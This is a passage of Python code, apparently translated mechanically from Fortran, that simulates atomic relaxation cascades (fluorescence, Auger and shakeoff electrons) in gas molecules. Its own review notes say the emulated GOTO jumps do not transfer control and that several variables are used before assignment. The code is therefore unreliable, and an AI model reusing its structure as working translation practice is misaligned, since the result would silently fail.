        # Pick and apply one fluorescence or Auger/Coster-Kronig transition.
        UPDATE(KGAS,LGAS,ISHELL)
        INIT=2
        # CHOOSE FLUORESCENCE OR AUGER TRANSITION
        TSUM=0.0
        for I in range(1,17+1):
            TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
            for J in range(1,17+1):
                TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
        # NO MORE TRANSITIONS POSSIBLE
        if(TSUM == 0.0):
            return
        # NORMALISE TO 1.0
        for I in range(1,17+1):
            RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
            for J in range(1,17+1):
                AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
        # CREATE CUMULATIVE SUM ARRAY (TEMP: radiative, TEMP1: Auger)
        TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
        for I in range(2,17+1):
            TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
        TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
        for I in range(2,17+1):
            TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
        for J in range(1,16+1):
            for I in range(1,17+1):
                TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
        # FIND FLUORESCENCE OR AUGER TRANSITION
        R1=random.uniform(0.0,1.0)
        for I in range(1,17+1):
            if(R1 < TEMP[I]) :
                # STORE PHOTON ENERGY AND UPDATE NOCC
                IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
                EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
                ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
                if(ELEFT < 0.0):
                    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # RANDOM EMISSION DIRECTION (isotropic)
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
                R4=random.uniform(0.0,1.0)
                PHI=TWOPI*R4
                DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
                DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
                DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
                NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                # FIND LOWEST VACANCY
                VACANCY(KGAS,LGAS,ISHELL,ILAST)
                if(ILAST == 1):
                    # NO MORE TRANSITIONS POSSIBLE
                    return
                # endif
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # endif -- duplicated emulated jump kept from the translation
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # AUGER BRANCH: R1 fell beyond the radiative cumulative sum.
        counter116=1
        while(counter116):
            counter116=0
            R2=R1-TEMP[17]
            for J in range(1,17+1):
                if(counter116):
                    break
                for I in range(1,17+1):
                    if(R2 < TEMP1[I+((J-1)*17)]) :
                        # AUGER OR COSTER KRONIG
                        # STORE EJECTED ELECTRON AND UPDATE NOCC
                        ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                        if(ETEMP < 0.0):
                            # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS:
                            # redraw R1 until it selects the Auger range,
                            # then restart the selection.
                            counter117=1
                            while(counter117):
                                counter117=0
                                R1=random.uniform(0.0,1.0)
                                if(R1 < TEMP[17]):
                                    counter117=1
                            counter116=1
                            break
                        # endif
                        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                        if(IONSUM[int(NVAC)]> 28) :
                            print(' 3RD GEN ION CHARGE LIMITED TO 28 IONSUM=', IONSUM[int(NVAC)])
                            sys.exit()
                        # endif
                        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                        ELEFT=ELEFT-ETEMP
                        if(ELEFT < 0.0):
                            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # RANDOM EMISSION DIRECTION (isotropic)
                        R3=random.uniform(0.0,1.0)
                        THET=numpy.arccos(1.0-2.0*R3)
                        R4=random.uniform(0.0,1.0)
                        PHI=TWOPI*R4
                        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                        NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                        NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                        # FIND LOWEST VACANCY
                        VACANCY(KGAS,LGAS,ISHELL,ILAST)
                        if(ILAST == 1):
                            # NO MORE TRANSITIONS POSSIBLE
                            return
                        # endif
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # endif -- duplicated emulated jump kept from the translation
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    print(' ERROR IN CASCADE 3')
    sys.exit()
# end
def CALC4(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
    """Simulate the fourth-generation atomic de-excitation cascade for
    gas KGAS, component LGAS, energy deposit ELECEN, initial vacancy in
    shell ISHELL.  Results accumulate in the CALCAS4 globals.

    FIXES relative to the translated original:
      * TEMP needs 18 slots (TEMP[17] is used); it had 17.
      * TEMP1 needs 290 slots (indexed up to 17+16*17 = 289); it had 289.
      * The Auger retry loop never reset counter116 (infinite loop);
        sibling routines CALC3/CALC5 reset it at the top of the loop.
      * TEMP1(I+((J-1)*17)) used call syntax instead of indexing.
      * DRX0(NVAC,L1) etc. used call syntax instead of indexing.
      * The first global set redeclared the CALCAS4 names; per the
        commented COMMON/CALCAS3/ declaration and CALC3/CALC5 it must be
        the '0'-suffixed previous-generation arrays (DRX0 is used below).

    NOTE(review): mechanical Fortran translation -- emulated GOTO calls
    do not transfer control; THET/DRXX/ESHK/JVAC/ILAST were Fortran
    out-parameters and are used before assignment; IPN/ICON are
    undefined at the top-level call.  Verify against the Fortran source.
    """
    # COMMON/GENCAS/ELEV[17,79],NSDEG(17),AA[17],BB[17],SCR,SCR1
    # COMMON/MIXC/PRSH(6,3,17,17),ESH(6,3,17),AUG(6,3,17,17,17),RAD[6,3,17,17],PRSHBT(6,3,17),IZ[6,3],INIOCC(6,3,17),ISHLMX(6,3),AMZ[6,3]
    # COMMON/UPD/NOCC(6,3,17),AUGR(6,3,17,17,17),RADR(6,3,17,17)
    # COMMON/CALCAS3/IONSUM0(10),IFLSUM0(10),ESTORE0(10,28),EPHOTON0(10,28),DRXE0(10,28),DRYE0(10,28),DRZE0(10,28),DRX0(10,28),DRY0(10,28),DRZ0(10,28)
    # COMMON/CALCAS4/IONSUM(10),IFLSUM(10),ESTORE(10,28),EPHOTON(10,28),DRXE(10,28),DRYE(10,28),DRZE(10,28),DRX(10,28),DRY(10,28),DRZ[10,28]
    #COMMON/GENCAS/
    global ELEV#[17,79]
    global NSDEG#[17]
    global AA#[17]
    global BB#[17]
    global SCR,SCR1
    #COMMON/MIXC/
    global PRSH#(6,3,17,17)
    global ESH#(6,3,17)
    global AUG#(6,3,17,17,17)
    global RAD#[6,3,17,17]
    global PRSHBT#(6,3,17)
    global IZ#[6,3]
    global INIOCC#(6,3,17)
    global ISHLMX#(6,3)
    global AMZ#[6,3]
    #COMMON/UPD/
    global NOCC#(6,3,17)
    global AUGR#(6,3,17,17,17)
    global RADR#(6,3,17,17)
    #COMMON/CALCAS3/ -- previous-generation results (FIX: '0' names)
    global IONSUM0#(10)
    global IFLSUM0#(10)
    global ESTORE0#(10,28)
    global EPHOTON0#(10,28)
    global DRXE0#(10,28)
    global DRYE0#(10,28)
    global DRZE0#(10,28)
    global DRX0#(10,28)
    global DRY0#(10,28)
    global DRZ0#(10,28)
    #COMMON/CALCAS4/ -- this generation's results
    global IONSUM#(10)
    global IFLSUM#(10)
    global ESTORE#(10,28)
    global EPHOTON#(10,28)
    global DRXE#(10,28)
    global DRYE#(10,28)
    global DRZE#(10,28)
    global DRX#(10,28)
    global DRY#(10,28)
    global DRZ#[10,28]
    # Fortran 1-based scratch arrays; element [0] unused.
    TEMP=[0 for x in range(18)]
    TEMP1=[0 for x in range(290)]
    #
    # CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
    # WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
    #
    ISTART=IONSUM[int(NVAC)]
    ISTARTF=IFLSUM[int(NVAC)]
    API=numpy.arccos(-1.00)   # pi
    TWOPI=2.00*API
    def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # (Re)start the cascade: reset occupancies, store photoelectron.
        ELEFT=ELECEN
        INIT=1
        # SET STARTING ARRAY NOCC EQUAL TO INIOCC
        for I in range(1,17+1):
            NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
        IONSUM[int(NVAC)]=ISTART+1
        IFLSUM[int(NVAC)]=ISTARTF
        # STORE PHOTOELECTRON ENERGY AND ANGLE
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
        ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        ELEFT=ELEFT-ELECN
        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
        # USE PHOTOELECTRON ANGULAR DISTRIBUTION
        APE=AA[ISHELL]
        BPE=BB[ISHELL]
        ANGGEN(APE,BPE,THET)
        if(THET < 0.0):
            THET=THET+API
        R3=random.uniform(0.0,1.0)
        PHI=TWOPI*R3
        # FIX: index the DRX0/DRY0/DRZ0 arrays (was Fortran call syntax).
        DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
    # LOOP AROUND CASCADE
    def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # CHECK FOR ELECTRON SHAKEOFF
        IDUM=1
        if(INIT > 1):
            ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        INSUM=IONSUM[int(NVAC)]
        SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
        # CALCULATE ENERGY OF ELECTRON
        if(JVAC == 0):
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # ELECTRON + SHAKEOFF
        ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
        # MAXIMUM ION CHARGE STATE =28
        if(IONSUM[int(NVAC)]> 28) :
            print(' 4TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
            sys.exit()
        # endif
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
        ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        if(ELEFT < 0.0):
            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # RANDOM EMISSION ANGLE (isotropic)
        R3=random.uniform(0.0,1.0)
        THET=numpy.arccos(1.0-2.0*R3)
        R4=random.uniform(0.0,1.0)
        PHI=TWOPI*R4
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
    def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Pick and apply one fluorescence or Auger/Coster-Kronig transition.
        UPDATE(KGAS,LGAS,ISHELL)
        INIT=2
        # CHOOSE FLUORESCENCE OR AUGER TRANSITION
        TSUM=0.0
        for I in range(1,17+1):
            TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
            for J in range(1,17+1):
                TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
        # NO MORE TRANSITIONS POSSIBLE
        if(TSUM == 0.0):
            return
        # NORMALISE TO 1.0
        for I in range(1,17+1):
            RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
            for J in range(1,17+1):
                AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
        # CREATE CUMULATIVE SUM ARRAY (TEMP: radiative, TEMP1: Auger)
        TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
        for I in range(2,17+1):
            TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
        TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
        for I in range(2,17+1):
            TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
        for J in range(1,16+1):
            for I in range(1,17+1):
                TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
        # FIND FLUORESCENCE OR AUGER TRANSITION
        R1=random.uniform(0.0,1.0)
        for I in range(1,17+1):
            if(R1 < TEMP[I]) :
                # STORE PHOTON ENERGY AND UPDATE NOCC
                IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
                EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
                ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
                if(ELEFT < 0.0):
                    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # RANDOM EMISSION DIRECTION (isotropic)
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
                R4=random.uniform(0.0,1.0)
                PHI=TWOPI*R4
                DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
                DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
                DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
                NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                # FIND LOWEST VACANCY
                VACANCY(KGAS,LGAS,ISHELL,ILAST)
                if(ILAST == 1):
                    # NO MORE TRANSITIONS POSSIBLE
                    return
                # endif
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # endif -- duplicated emulated jump kept from the translation
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # AUGER BRANCH: R1 fell beyond the radiative cumulative sum.
        counter116=1
        while(counter116):
            # FIX: reset the flag each pass (was missing -> infinite loop).
            counter116=0
            R2=R1-TEMP[17]
            for J in range(1,17+1):
                if(counter116):
                    break
                for I in range(1,17+1):
                    # FIX: index TEMP1 (was Fortran call syntax TEMP1(...)).
                    if(R2 < TEMP1[I+((J-1)*17)]) :
                        # AUGER OR COSTER KRONIG
                        # STORE EJECTED ELECTRON AND UPDATE NOCC
                        ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                        if(ETEMP < 0.0):
                            # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS:
                            # redraw R1 until it selects the Auger range,
                            # then restart the selection.
                            counter117=1
                            while(counter117):
                                counter117=0
                                R1=random.uniform(0.0,1.0)
                                if(R1 < TEMP[17]):
                                    counter117=1
                            counter116=1
                            break
                        # endif
                        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                        if(IONSUM[int(NVAC)]> 28) :
                            print(' 4TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
                            sys.exit()
                        # endif
                        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                        ELEFT=ELEFT-ETEMP
                        if(ELEFT < 0.0):
                            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # RANDOM EMISSION DIRECTION (isotropic)
                        R3=random.uniform(0.0,1.0)
                        THET=numpy.arccos(1.0-2.0*R3)
                        R4=random.uniform(0.0,1.0)
                        PHI=TWOPI*R4
                        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                        NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                        NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                        # FIND LOWEST VACANCY
                        VACANCY(KGAS,LGAS,ISHELL,ILAST)
                        if(ILAST == 1):
                            # NO MORE TRANSITIONS POSSIBLE
                            return
                        # endif
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # endif -- duplicated emulated jump kept from the translation
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    print(' ERROR IN CASCADE 4')
    sys.exit()
# end
def CALC5(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
    """Simulate the fifth-generation atomic de-excitation cascade for gas
    KGAS, component LGAS, energy deposit ELECEN, initial vacancy in
    shell ISHELL.  Results accumulate in the CALCAS5 globals.

    FIXES relative to the translated original:
      * TEMP needs 18 slots (TEMP[17] is used); it had 17.
      * TEMP1 needs 290 slots (indexed up to 17+16*17 = 289); it had 289.

    NOTE(review): mechanical Fortran translation -- emulated GOTO calls
    do not transfer control; THET/DRXX/ESHK/JVAC/ILAST were Fortran
    out-parameters and are used before assignment; IPN/ICON are
    undefined at the top-level call.  Verify against the Fortran source.
    """
    #COMMON/GENCAS/
    global ELEV#[17,79]
    global NSDEG#[17]
    global AA#[17]
    global BB#[17]
    global SCR,SCR1
    #COMMON/MIXC/
    global PRSH#(6,3,17,17)
    global ESH#(6,3,17)
    global AUG#(6,3,17,17,17)
    global RAD#[6,3,17,17]
    global PRSHBT#(6,3,17)
    global IZ#[6,3]
    global INIOCC#(6,3,17)
    global ISHLMX#(6,3)
    global AMZ#[6,3]
    #COMMON/UPD/
    global NOCC#(6,3,17)
    global AUGR#(6,3,17,17,17)
    global RADR#(6,3,17,17)
    #COMMON/CALCAS4/ -- previous-generation results
    global IONSUM0#(10)
    global IFLSUM0#(10)
    global ESTORE0#(10,28)
    global EPHOTON0#(10,28)
    global DRXE0#(10,28)
    global DRYE0#(10,28)
    global DRZE0#(10,28)
    global DRX0#(10,28)
    global DRY0#(10,28)
    global DRZ0#(10,28)
    #COMMON/CALCAS5/ -- this generation's results
    global IONSUM#(10)
    global IFLSUM#(10)
    global ESTORE#(10,28)
    global EPHOTON#(10,28)
    global DRXE#(10,28)
    global DRYE#(10,28)
    global DRZE#(10,28)
    global DRX#(10,28)
    global DRY#(10,28)
    global DRZ#[10,28]
    # Fortran 1-based scratch arrays; element [0] unused.
    TEMP=[0 for x in range(18)]
    TEMP1=[0 for x in range(290)]
    #
    # CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
    # WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
    #
    ISTART=IONSUM[int(NVAC)]
    ISTARTF=IFLSUM[int(NVAC)]
    API=numpy.arccos(-1.00)   # pi
    TWOPI=2.00*API
    def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # (Re)start the cascade: reset occupancies, store photoelectron.
        ELEFT=ELECEN
        INIT=1
        # SET STARTING ARRAY NOCC EQUAL TO INIOCC
        for I in range(1,17+1):
            NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
        IONSUM[int(NVAC)]=ISTART+1
        IFLSUM[int(NVAC)]=ISTARTF
        # STORE PHOTOELECTRON ENERGY AND ANGLE
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
        ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        ELEFT=ELEFT-ELECN
        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
        # USE PHOTOELECTRON ANGULAR DISTRIBUTION
        APE=AA[ISHELL]
        BPE=BB[ISHELL]
        ANGGEN(APE,BPE,THET)
        if(THET < 0.0):
            THET=THET+API
        R3=random.uniform(0.0,1.0)
        PHI=TWOPI*R3
        DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
    # LOOP AROUND CASCADE
    def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # CHECK FOR ELECTRON SHAKEOFF
        IDUM=1
        if(INIT > 1):
            ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        INSUM=IONSUM[int(NVAC)]
        SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
        # CALCULATE ENERGY OF ELECTRON
        if(JVAC == 0):
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # ELECTRON + SHAKEOFF
        ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
        # MAXIMUM ION CHARGE STATE =28
        if(IONSUM[int(NVAC)]> 28) :
            print(' 5TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
            sys.exit()
        # endif
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
        ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        if(ELEFT < 0.0):
            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # RANDOM EMISSION ANGLE (isotropic)
        R3=random.uniform(0.0,1.0)
        THET=numpy.arccos(1.0-2.0*R3)
        R4=random.uniform(0.0,1.0)
        PHI=TWOPI*R4
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
    def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Pick and apply one fluorescence or Auger/Coster-Kronig transition.
        UPDATE(KGAS,LGAS,ISHELL)
        INIT=2
        # CHOOSE FLUORESCENCE OR AUGER TRANSITION
        TSUM=0.0
        for I in range(1,17+1):
            TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
            for J in range(1,17+1):
                TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
        # NO MORE TRANSITIONS POSSIBLE
        if(TSUM == 0.0):
            return
        # NORMALISE TO 1.0
        for I in range(1,17+1):
            RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
            for J in range(1,17+1):
                AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
        # CREATE CUMULATIVE SUM ARRAY (TEMP: radiative, TEMP1: Auger)
        TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
        for I in range(2,17+1):
            TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
        TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
        for I in range(2,17+1):
            TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
        for J in range(1,16+1):
            for I in range(1,17+1):
                TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
        # FIND FLUORESCENCE OR AUGER TRANSITION
        R1=random.uniform(0.0,1.0)
        for I in range(1,17+1):
            if(R1 < TEMP[I]) :
                # STORE PHOTON ENERGY AND UPDATE NOCC
                IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
                EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
                ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
                if(ELEFT < 0.0):
                    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # RANDOM EMISSION DIRECTION (isotropic)
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
                R4=random.uniform(0.0,1.0)
                PHI=TWOPI*R4
                DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
                DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
                DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
                NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                # FIND LOWEST VACANCY
                VACANCY(KGAS,LGAS,ISHELL,ILAST)
                if(ILAST == 1):
                    # NO MORE TRANSITIONS POSSIBLE
                    return
                # endif
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                # endif -- duplicated emulated jump kept from the translation
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # AUGER BRANCH: R1 fell beyond the radiative cumulative sum.
        counter116=1
        while(counter116):
            counter116=0
            R2=R1-TEMP[17]
            for J in range(1,17+1):
                if(counter116):
                    break
                for I in range(1,17+1):
                    if(R2 < TEMP1[I+((J-1)*17)]) :
                        # AUGER OR COSTER KRONIG
                        # STORE EJECTED ELECTRON AND UPDATE NOCC
                        ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                        if(ETEMP < 0.0):
                            # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS:
                            # redraw R1 until it selects the Auger range,
                            # then restart the selection.
                            counter117=1
                            while(counter117):
                                counter117=0
                                R1=random.uniform(0.0,1.0)
                                if(R1 < TEMP[17]):
